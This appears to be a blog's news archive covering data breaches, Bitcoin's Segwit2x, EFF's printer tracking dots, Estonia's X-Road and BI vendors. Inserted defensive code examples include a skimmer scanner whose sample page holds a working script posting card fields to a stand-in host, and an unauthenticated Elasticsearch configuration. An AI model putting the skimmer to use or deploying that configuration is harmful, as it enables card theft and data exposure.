Archive for the ‘News’ Category

Luscious.net leaks the details of 1 million users. According to researchers at vpnMentor, an unsecured database gave access to Luscious account holders’ personal details.

The accessible data included usernames, email addresses, activity logs, and location data for all 1.195 million users.

“Our team was able to access this database because it was completely unsecured and unencrypted,” writes the vpnMentor team. 

If Luscious users happened to use email addresses associated with their real names to register accounts, that information — tied to location data — could be more than enough to associate specific Luscious accounts with their owners. Users’ video uploads to the site were also accessible.

The breach was discovered on Aug. 15, and, after being notified by vpnMentor, Luscious fixed the issue on Aug. 19. That doesn’t mean, however, that no harm was done. 

“While the data breach is now closed,” write the researchers, “it’s still possible that other hackers could have accessed it earlier and extracted the same data we viewed.” 

“A greater issue of concern is the fact that many users joined Luscious on official government emails,” notes vpnMentor. “We found examples of this from users in Brazil, Australia, Italy, Malaysia, and Australia.”

The 2015 Ashley Madison hack demonstrated how this type of information is practically designed for blackmail. In that case, a dating site purportedly offering to put married men in touch with women was breached, and its database consisting of usernames and emails fell into the hands of hackers.

Organisations have had it easy for some time, but data breaches are increasingly being met with penalties, including fines backed by the GDPR. Some noted fines are:

- British Airways: £183M under the GDPR (about A$328M)
- Marriott: £99M under the GDPR
- Facebook: US$5B from the US FTC over the Cambridge Analytica data harvesting

In Australia, the OAIC reports that it received 812 privacy complaints in 2018.

Notable breaches of 2019:

Entity                               | Records          | Organization type         | Method
2019 Bulgarian revenue agency hack   | over 5,000,000   | government                | hacked
Canva                                | 140,000,000      | web                       | hacked
Capital One                          | 106,000,000      | financial                 | hacked
Desjardins                           | 2,900,000        | financial                 | inside job
Facebook                             | 540,000,000      | social network            | poor security
Facebook                             | 1,500,000        | social network            | accidentally uploaded
First American Corporation           | 885,000,000      | financial service company | poor security
Health Sciences Authority (Singapore)| 808,000          | healthcare                | poor security
Justdial                             | 100,000,000      | local search              | unprotected API
Ministry of Health (Singapore)       | 14,200           | healthcare                | poor security / inside job
Quest Diagnostics                    | 11,900,000       | clinical laboratory       | poor security
StockX                               | 6,800,000        | retail                    | hacked
Truecaller                           | 299,055,819      | telephone directory       | unknown
Woodruff Arts Center                 | unknown          | arts group                | poor security
Westpac                              | 98,000           | financial                 | hacked
Australian National University       | 19 years of data | academic                  | hacked

Here is a link to coverage of one of the fines noted.

https://www.abc.net.au/news/2019-07-08/british-airways-cybercrime-credit-card-hack-fine/11289738

#10 — Panera

Number of victims: 37 million
Who was targeted: All PaneraBread.com customer accounts
What data was exposed: Names, email and physical addresses, birthdays, and the last four digits of the customers’ credit card numbers
Timeframe: Disclosed April 2018
What happened: Despite being warned by a cybersecurity researcher in August 2017 that its website was leaking customer data, Panera did not act until eight months later, when it acknowledged the leak and took the site down for security maintenance.

#9 — Newegg

Number of victims: 50 million
Who was targeted: Newegg online shoppers
What data was exposed: Credit card information
Timeframe: August 14, 2018 – September 18, 2018
What happened: The online retailer was compromised by the Magecart group, who injected credit-card-skimming code into the payment page of the Newegg website. Whenever a customer paid for an order, a copy of the payment details was sent straight to Magecart’s command-and-control (C&C) server.
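A web skimmer of the kind described above has a recognisable shape in the page source: a script that hooks the checkout form’s submission and ships the field values to a host the site does not own, or an externally loaded script that a compromised CDN could silently replace. The scanner below is an added example, not code from this post, from Newegg or from Magecart; it flags those traces in a page. The checkout page, the hosts shop.example, cdn.example and stats.example, and the allowlist of hosts the site trusts are all constructed for the example.

```go
// Added example (not code from the original post, from Newegg or from Magecart):
// a static scanner for the traces a web skimmer leaves in a checkout page.
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one suspicious script found in a page.
type Finding struct {
	Kind   string // "external-script" or "inline-exfil"
	Detail string
}

var (
	scriptRe    = regexp.MustCompile(`(?is)<script\b([^>]*)>(.*?)</script>`)
	srcRe       = regexp.MustCompile(`(?i)\bsrc\s*=\s*["']([^"']+)["']`)
	integrityRe = regexp.MustCompile(`(?i)\bintegrity\s*=`)
	hostRe      = regexp.MustCompile(`(?i)https?://([a-z0-9.-]+)`)
	// A hook on form submission, the moment card data is present in the DOM.
	hookRe = regexp.MustCompile(`(?i)addEventListener\s*\(\s*["']submit["']|onsubmit|\.submit\s*=`)
	// The usual ways of getting data out of the page.
	sendRe = regexp.MustCompile(`(?i)XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=`)
)

// ScanHTML inspects every <script> element in page. allowedHosts is the set of
// hosts permitted to serve script for, or receive data from, this site (an
// assumed allowlist; the real site's list is not known). One Finding per problem.
func ScanHTML(page string, allowedHosts []string) []Finding {
	allowed := map[string]bool{}
	for _, h := range allowedHosts {
		allowed[strings.ToLower(h)] = true
	}
	var findings []Finding
	for _, m := range scriptRe.FindAllStringSubmatch(page, -1) {
		attrs, body := m[1], m[2]
		if s := srcRe.FindStringSubmatch(attrs); s != nil {
			// External script: it must come from an allowlisted host and carry
			// Subresource Integrity, or a compromised CDN can swap its contents.
			if h := hostRe.FindStringSubmatch(s[1]); h != nil {
				host := strings.ToLower(h[1])
				switch {
				case !allowed[host]:
					findings = append(findings, Finding{"external-script", "loaded from non-allowlisted host " + host})
				case !integrityRe.MatchString(attrs):
					findings = append(findings, Finding{"external-script", "no integrity attribute on " + s[1]})
				}
			}
			continue
		}
		// Inline script: a submit hook combined with an outbound send to a
		// host outside the allowlist is the skimmer signature.
		if hookRe.MatchString(body) && sendRe.MatchString(body) {
			for _, h := range hostRe.FindAllStringSubmatch(body, -1) {
				if host := strings.ToLower(h[1]); !allowed[host] {
					findings = append(findings, Finding{"inline-exfil", "submit hook sends form data to " + host})
				}
			}
		}
	}
	return findings
}

// SamplePage is a constructed checkout page, not the real Newegg page. The
// hosts shop.example and cdn.example are the site's own; stats.example plays
// the attacker's collection server. The integrity value is a placeholder.
const SamplePage = `<html><body>
<form id="pay" action="/checkout" method="post">
  <input name="cc" placeholder="card number"> <input name="cvv">
  <button>Pay</button>
</form>
<script src="https://cdn.example/lib.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://cdn.example/tracker.js"></script>
<script>
document.getElementById('pay').addEventListener('submit', function () {
  var d = Array.from(document.querySelectorAll('#pay input'))
    .map(function (i) { return i.name + '=' + encodeURIComponent(i.value); }).join('&');
  var x = new XMLHttpRequest();
  x.open('POST', 'https://stats.example/collect', true);
  x.send(d);
});
</script>
</body></html>`

func main() {
	for _, f := range ScanHTML(SamplePage, []string{"shop.example", "cdn.example"}) {
		fmt.Printf("%-16s %s\n", f.Kind, f.Detail)
	}
}
```

Run against the sample page it reports the tracker script loaded without Subresource Integrity and the inline script that posts the form fields to stats.example. A scanner like this is a last line of defence: the setting that actually stops this class of attack is a Content-Security-Policy whose connect-src and script-src list only the hosts the checkout page needs, so the browser refuses the outbound post even when the skimmer is already in the page.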

#8 — Elasticsearch

Number of victims: 82 million (57M consumers, 26M businesses)
Who was targeted: Users and online businesses across the internet
What data was exposed: From individual users: names, email and physical addresses, phone numbers, IP addresses, employers, and job titles. From businesses: names, company details, zip codes, carrier routes, latitudes/longitudes, census tracts, phone numbers, web addresses, email addresses, employee count, revenue numbers, NAICS codes, SIC codes, and more.
Timeframe: Discovered November 14, 2018
What happened: This is one of the cases where a routine scan by a security researcher turned up more than 80 million records of aggregated personal and business data sitting in Elasticsearch instances with no authentication. It is unknown how long the databases were exposed or who, if anyone, copied the data. Researchers traced the likely source to a data management company that has since closed, but the owner has not been officially confirmed.
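The Luscious exposure at the top of this page and this case share one root cause: a data store reachable from the internet with no authentication. As an added example, not the configuration of either company (neither report names the settings involved), here is the Elasticsearch configuration pattern that produces such an exposure beside the one that closes it. The two fragments are alternative elasticsearch.yml files shown together; the keystore file names are assumptions.

```yaml
# ---- elasticsearch.yml as typically found on exposed hosts (added example, not any named company's file) ----
network.host: 0.0.0.0          # listens on every interface, including the public one
xpack.security.enabled: false  # no authentication: anyone who can reach port 9200 can read every index

# ---- elasticsearch.yml, hardened ----
network.host: 127.0.0.1        # or the private interface the application uses; never a public address
xpack.security.enabled: true   # every request must authenticate; roles decide what it may read
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: http.p12                        # assumed file name
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.keystore.path: elastic-certificates.p12   # assumed file name
xpack.security.transport.ssl.verification_mode: certificate
```

The check is a single unauthenticated request from outside the network: `curl -s http://HOST:9200/_cat/indices?v`. On an exposed instance it lists every index with its document count, which is exactly what the researchers in these stories found; on the hardened one it returns HTTP 401. Put a network rule (security group or firewall) in front of the port as well, so that one mis-set line is never the only thing between the data and the internet.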

#7 — Facebook

Number of victims: 87 million
Who was targeted: Facebook users
What data was exposed: Profile information, political beliefs, friend networks, private messages
Timeframe: Disclosed March 2018
What happened: This is the Cambridge Analytica scandal, in which the data-analytics firm harvested users’ information through a third-party app without their consent. The operation was politically motivated, aimed at influencing the 2016 US presidential campaign. Although the harvesting took place years earlier, the investigations that concluded in 2018 gave a much clearer picture of what happened.

#6 — MyHeritage

Number of victims: 92 million
Who was targeted: MyHeritage users
What data was exposed: Email addresses and hashed passwords
Timeframe: Alerted June 2018
What happened: A security researcher alerted the genealogy site in June 2018 that a file containing MyHeritage account data had been found on an outside server. The company confirmed the data was genuine and told users that every account created before October 26, 2017 was affected and that those users should change their passwords.

#5 — Quora

Number of victims: 100 million
Who was targeted: Quora users
What data was exposed: Names, email addresses, hashed passwords, profile data, public and non-public actions
Timeframe: Disclosed December 3, 2018
What happened: Many details remain unclear; the question-and-answer site told its users that a third party had gained unauthorized access to one of its systems and said no more.

#4 — Under Armour

Number of victims: 150 million
Who was targeted: MyFitnessPal users
What data was exposed: Usernames, email addresses, hashed passwords
Timeframe: Late February 2018
What happened: The company’s food and nutrition app was breached, exposing the data above but, fortunately, no payment information, which the company processes through a separate channel.

#3 — Exactis

Number of victims: 340 million (230M consumers, 110M businesses)
Who was targeted: Consumers and businesses across the internet
What data was exposed: Over 400 categories of detail, such as phone numbers, email and physical addresses, interests, ages, religions, pet ownership, etc.
Timeframe: June 2018
What happened: Data broker Exactis left roughly 2 terabytes of records on a publicly accessible server with no authentication. It is unknown who, or how many people, accessed the data before the exposure was discovered.

#2 — Starwood

Number of victims: 500 million
Who was targeted: Starwood guests
What data was exposed: Names, email and physical addresses, phone numbers, passport numbers, account information, birth dates, gender, travel and accommodation details. For some guests, encrypted payment card numbers and expiry dates were also taken.
Timeframe: Discovered September 10, 2018, with unauthorized access going back as far as 2014
What happened: As in many official breach statements, the Marriott-owned hotel chain said only that its reservation database had suffered “unauthorized access”; subsequent reporting on the investigation attributed the intrusion to Chinese state-sponsored actors.

#1 — Aadhaar

Number of victims: 1.1 billion
Who was targeted: Indian citizens
What data was exposed: Aadhaar numbers, names, email and physical addresses, phone numbers, and photos
Timeframe: August 2017 – January 2018
What happened: Anonymous sellers on WhatsApp charged Rs 500 or less for login credentials to a portal into the Unique Identification Authority of India’s database, putting the records of virtually every citizen at the buyer’s fingertips.

Bitcoin is a cryptocurrency built on a blockchain. Like a conventional currency it serves as a store of value, and it is hailed as a revolutionary technology for that purpose. Its popularity stems in part from distrust of fiat currencies and of the unconstrained printing of currencies such as the US dollar.

Bitcoin is governed by its developers and by the infrastructure that runs it. Miners, who validate and order the transactions in the Bitcoin ecosystem, operate under shared consensus rules that regulate and evolve the Bitcoin economy. Those rules fix parameters such as the supply cap, the block size and others.

Today the Bitcoin community is seeking to evolve Bitcoin through agreed changes. Segwit2x, also known as the New York Agreement, is an industry-wide compromise spearheaded in May 2017 by Barry Silbert, CEO and founder of Digital Currency Group, to activate the Segregated Witness (SegWit) scaling upgrade for Bitcoin and then raise the block size limit to 2 MB. Key mining pools and exchanges that signed up to the plan include Bitmain’s Antpool, Btc.top, Bixin, Btcc Pool, F2pool, Huobi, Okcoin, Viabtc, BW, 1Hash, Canoe, Batpool, and Bitkan.

The announcement closely follows Bitmain’s publication of its contingency plan against the user-activated soft fork BIP148, which Bitmain CEO Jihan Wu has described as an attack on Bitcoin. He spoke at the summit on June 14 about BIP148’s weaknesses and how to prevent it from activating.

Chinese mining pools account for roughly 80% of Bitcoin’s hash power, so China typically plays a dominant role in deciding Bitcoin’s future.


In 2005, a research team led by the Electronic Frontier Foundation (EFF) broke the code behind tiny tracking dots that some color laser printers secretly hide in every document.

The U.S. Secret Service admitted that the tracking information is part of a deal struck with selected color laser printer manufacturers, ostensibly to identify counterfeiters. However, the nature of the private information encoded in each document was not previously known.

“We’ve found that the dots from at least one line of printers encode the date and time your document was printed, as well as the serial number of the printer,” said EFF Staff Technologist Seth David Schoen.

You can see the dots on color prints from machines made by Xerox, Canon, and other manufacturers (for a list of the printers we investigated so far, see: http://www.eff.org/Privacy/printers/list.php). The dots are yellow, less than one millimeter in diameter, and are typically repeated over each page of a document. In order to see the pattern, you need a blue light, a magnifying glass, or a microscope (for instructions on how to see the dots, see: http://www.eff.org/Privacy/printers/docucolor/).

EFF and its partners began their project to break the printer code with the Xerox DocuColor line. Researchers Schoen, EFF intern Robert Lee, and volunteers Patrick Murphy and Joel Alwen compared dots from test pages sent in by EFF supporters, noting similarities and differences in their arrangement, and then found a simple way to read the pattern.

“So far, we’ve only broken the code for Xerox DocuColor printers,” said Schoen. “But we believe that other models from other manufacturers include the same personally identifiable information in their tracking dots.”

You can decode your own Xerox DocuColor prints using EFF’s automated program at http://www.eff.org/Privacy/printers/docucolor/index.php#program.

Xerox previously admitted that it provided these tracking dots to the government, but indicated that only the Secret Service had the ability to read the code. The Secret Service maintains that it only uses the information for criminal counterfeit investigations. However, there are no laws to prevent the government from abusing this information.

“Underground democracy movements that produce political or religious pamphlets and flyers, like the Russian samizdat of the 1980s, will always need the anonymity of simple paper documents, but this technology makes it easier for governments to find dissenters,” said EFF Senior Staff Attorney Lee Tien. “Even worse, it shows how the government and private industry make backroom deals to weaken our privacy by compromising everyday equipment like printers. The logical next question is: what other deals have been or are being made to ensure that our technology rats on us?”

EFF is still working on cracking the codes from other printers and we need the public’s help. Find out how you can make your own test pages to be included in our research at http://www.eff.org/Privacy/printers/wp.php#testsheets.

Estonia is a small country bordering Russia and Latvia, across the Gulf of Finland from Finland. It boasts an advanced information-management platform for government.

That platform is X-Road, an invisible but crucial backbone for data exchange between the databases behind e-services in both the public and private sectors; it is what makes those systems interoperate.

Estonia’s data stores are decentralised, meaning:

- There is no single owner or controller
- Every government agency or business can choose the products suitable for it
- Services are added one at a time, as they are ready

All Estonian services that draw on multiple data stores use X-Road as the central connection between them. All outgoing data from X-Road is digitally signed and encrypted; all incoming data is authenticated and logged.
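The four properties in that sentence (sign, encrypt, authenticate, log) are the whole contract between two X-Road security servers, and they compose in a fixed order: sign the payload first, encrypt the signed message, and on receipt decrypt, verify against the sender’s registered key, and write a log entry whatever the outcome. The program below is an added example modelling that exchange; it is not X-Road’s own code. It assumes Ed25519 signatures and a pre-shared 32-byte AES-256-GCM link key in place of X-Road’s X.509 certificates and TLS, and the organisation names and payloads are constructed.

```go
// Added example, not X-Road's own code; assumptions are in the lead-in above.
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
)

// Envelope is what travels between two security servers.
type Envelope struct {
	Sender string // organisation name, also bound in as GCM associated data
	Nonce  []byte
	Body   []byte // AES-GCM ciphertext of signature || payload
}

// LogEntry is one record in the receiver's append-only message log.
type LogEntry struct{ Sender, Reason string; Accepted bool }

type Sender struct {
	Name string
	priv ed25519.PrivateKey
	aead cipher.AEAD
}

type Receiver struct {
	keys map[string]ed25519.PublicKey // signing keys of registered senders
	aead cipher.AEAD
	Log  []LogEntry
}

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// newAEAD wraps the pre-shared 32-byte link key in AES-256-GCM.
func newAEAD(linkKey []byte) cipher.AEAD { return must(cipher.NewGCM(must(aes.NewCipher(linkKey)))) }

func NewSender(name string, linkKey []byte) *Sender {
	_, priv, err := ed25519.GenerateKey(rand.Reader)
	return &Sender{Name: name, priv: must(priv, err), aead: newAEAD(linkKey)}
}

func (s *Sender) PublicKey() ed25519.PublicKey { return s.priv.Public().(ed25519.PublicKey) }

// Send signs the payload, then encrypts signature||payload; the sender name is GCM associated data, so a ciphertext cannot be replayed under another name.
func (s *Sender) Send(payload []byte) Envelope {
	sig := ed25519.Sign(s.priv, payload)
	nonce := make([]byte, s.aead.NonceSize())
	must(rand.Read(nonce))
	plain := append(append([]byte{}, sig...), payload...)
	return Envelope{Sender: s.Name, Nonce: nonce, Body: s.aead.Seal(nil, nonce, plain, []byte(s.Name))}
}

func NewReceiver(linkKey []byte) *Receiver {
	return &Receiver{keys: map[string]ed25519.PublicKey{}, aead: newAEAD(linkKey)}
}

func (r *Receiver) Register(name string, pub ed25519.PublicKey) { r.keys[name] = pub }

// Receive decrypts, verifies the signature against the registered key and logs the outcome; only an authenticated payload is returned.
func (r *Receiver) Receive(e Envelope) ([]byte, error) {
	reject := func(reason string) ([]byte, error) {
		r.Log = append(r.Log, LogEntry{Sender: e.Sender, Reason: reason})
		return nil, errors.New(reason)
	}
	pub, ok := r.keys[e.Sender]
	if !ok {
		return reject("unknown sender")
	}
	plain, err := r.aead.Open(nil, e.Nonce, e.Body, []byte(e.Sender))
	if err != nil || len(plain) < ed25519.SignatureSize {
		return reject("decryption failed")
	}
	sig, payload := plain[:ed25519.SignatureSize], plain[ed25519.SignatureSize:]
	if !ed25519.Verify(pub, payload, sig) {
		return reject("bad signature")
	}
	r.Log = append(r.Log, LogEntry{Sender: e.Sender, Reason: "ok", Accepted: true})
	return payload, nil
}

func main() {
	linkKey := make([]byte, 32)
	must(rand.Read(linkKey))
	register := NewSender("population-register", linkKey)
	tax := NewReceiver(linkKey)
	tax.Register(register.Name, register.PublicKey())
	got, err := tax.Receive(register.Send([]byte(`{"query":"address"}`)))
	fmt.Printf("registered sender: err=%v payload=%s\n", err, got)
	impostor := NewSender("population-register", linkKey) // same name, unregistered signing key
	_, err = tax.Receive(impostor.Send([]byte(`{"query":"address"}`)))
	fmt.Printf("impostor: %v\nlog: %+v\n", err, tax.Log)
}
```

The point the second half of main makes is that encryption alone is not authentication: the impostor holds the link key and produces a perfectly decryptable message, and it is only the signature check against the registered key that rejects it. The log records that rejection alongside the accepted message, which is what lets an audit later answer who asked for what.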

X-Road was built to support queries across multiple data stores, but has evolved to support writes across multiple data stores and the transfer of large datasets as well. It was also designed for growth and currently supports:

- 287 million queries (2013)
- 170 connected databases in Estonia
- 2,000 services in Estonia
- 900 organisations connecting daily
- the more than 50% of Estonians who use the government portal Eesti.ee

Services provided via X-Road include:

- Electronic registration of residency
- Updating personal data (address, exam results, health insurance, etc.)
- Declaring taxes electronically
- Checking driving licence validity
- Checking for registered vehicles
- Registering newborn children for health insurance

Estonia actively showcases its e-society. To transform its society into a community of digital governance and tech-savvy individuals, children as young as 7 are taught the principles and basics of coding.

Estonians are driven, forward-thinking and entrepreneurial, and the same goes for the government. It takes only five minutes to register a company there and, according to The Economist, the country in 2013 held the world record for the number of startups per person. And it’s not quantity over quality: Many Estonian startups are now successful companies that you may recognize, such as Skype, Transferwise, Pipedrive, Cloutex, Click & Grow, GrabCAD, Erply, Fortumo, Lingvist and others.

If all this sounds enticing and you wish to become an entrepreneur there, you’re in luck; starting a business in Estonia is easy, and you can do it without packing your bags, thanks to its e-residency service, a transnational digital identity available to anyone. An e-resident can not only establish a company in Estonia through the Internet, but they can also have access to other online services that have been available to Estonians for over a decade. This includes e-banking and remote money transfers, declaring Estonian taxes online, digitally signing and verifying contracts and documents, and much more.

E-residents are issued a smart ID card, the legal equivalent of a handwritten signature and face-to-face identification in Estonia and recognised across the EU. The card’s keys are 2048-bit RSA keys, and the signature and identification functions are backed by two certificates stored on the chip: one for authentication and one for digital signing.

Innovation does not stop there. Blockchain, the technology behind Bitcoin, already protects the integrity of e-residency data and will be used to secure 1 million Estonian health records. The chain will register every change made to a record, legitimate or not, so that the records’ authenticity can be verified and tampering detected.

There are many lessons to learn from Estonia. To increase the efficiency and maturity of services, a country needs to be willing to adapt and evolve its infrastructure to the needs of the new economy: transparency, and precise and equitable delivery of services to the community.

Are you famous yet? In another case of  “Schadenfreude“, the Panama Papers have placed a list of dignitaries in the public spotlight a year after the German newspaper Süddeutsche Zeitung received 2.6 terabytes of documents related to Mossack Fonseca from an anonymous source. This eclipses Wikileaks Cablegate 2010 (1.7 GB), Offshore Leaks 2013 (260 GB), Lux Leaks 2014 (4 GB), and Swiss Leaks 2015 (3.3 GB).

The Panama Papers comprises e-mails, PDF files, photos, and excerpts of an internal Mossack Fonseca database. It covers a period spanning from the 1970s to the spring of 2016 with data on some 214,000 companies. There is a folder for each shell firm that contains e-mails, contracts, transcripts, and scanned documents. The leak comprises 4,804,618 emails, 3,047,306 database format files, 2,154,264 PDFs, 1,117,026 images, 320,166 text files, and 2,242 files in other formats.

Meet Nuix, the Australian company that has the technology to make sense of all this data.

Congratulations to Pratap Ranade and Ryan Rowe: the web-scraping-as-a-service company they co-founded, Kimonolabs, has been acquired by Palantir.

Kimonolabs started in the Winter 2014 Y Combinator class and raised USD 5M in 2014, but that did not stop the founders from shutting the service down and taking jobs at Palantir. Pratap explained that the startup had not been able to have the impact it wanted within two years of launch. So Kimonolabs falls by the wayside, as many other web-scraping tools have, leaving its 125K users in the lurch.

They have given users two weeks’ notice to migrate data and services off the platform. The last day is 29 Feb 2016; the absolute last day for API services is 31 March 2016. User data will be purged, and Palantir will not have access to it. If you depend on this service, you are probably scrambling for alternatives at this point. When you next assess the risk of depending on a service like Kimonolabs, weigh the financial and resourcing stability of the vendor.

There are many alternative web scraping tools and technologies; established SaaS ETL services are also viable alternatives.

Periscope Data is a cloud-based business intelligence analytics and distribution platform. Periscope Data has taken the pain out of data loading by directly connecting to your data sources with no messy ETLs.

Periscope visualizes your data into charts, graphs and dashboards. All you need to do is to write SQL queries in Periscope and it returns charts and reports and dashboards that you can share or embed.

Periscope is licensed by the number of data rows you share with Periscope. You can have unlimited users. Your Periscope package includes Unlimited Charts, Unlimited Users, Dashboards, Unlimited Embedding and white-labeling, and Unlimited Support.

Package pricing starts at $1,000 a month for up to 1 billion rows of data and scales linearly from there. There is no annual commitment; you can pay month to month.

You can take advantage of the Periscope caching tool at no additional cost. Caching reduces load on your database, improves performance, and lets you upload CSVs and do cross-database joins. Periscope claims queries run up to 150x faster with caching.

https://www.periscopedata.com/ http://wiki.glitchdata.com/index.php?title=Periscope_Data

If you haven’t heard of Yellowfin BI, it is a passionate startup focused on making Business Intelligence easy. Established in 2003, Yellowfin has been developed to satisfy a range of BI needs, from small businesses, to massive enterprise deployments and software vendors.

Yellowfin makes a Business Intelligence platform built on top of Tomcat/Java that processes and presents information in refreshing detail. It’s easy to assemble and lets you focus on building new business value rapidly. Yellowfin can be deployed on any server, cloud or on-premise.

Yellowfin is the second Australian vendor ever to appear in the Gartner Magic Quadrant.

Growing organically, it can barely be called a startup these days, with more than 100 employees and offices in 4 countries. Yellowfin is running a series of presentations of its technology in December:

- Melbourne – 1 Dec
- Sydney – 2 Dec
- Auckland – 3 Dec

Register for the event today!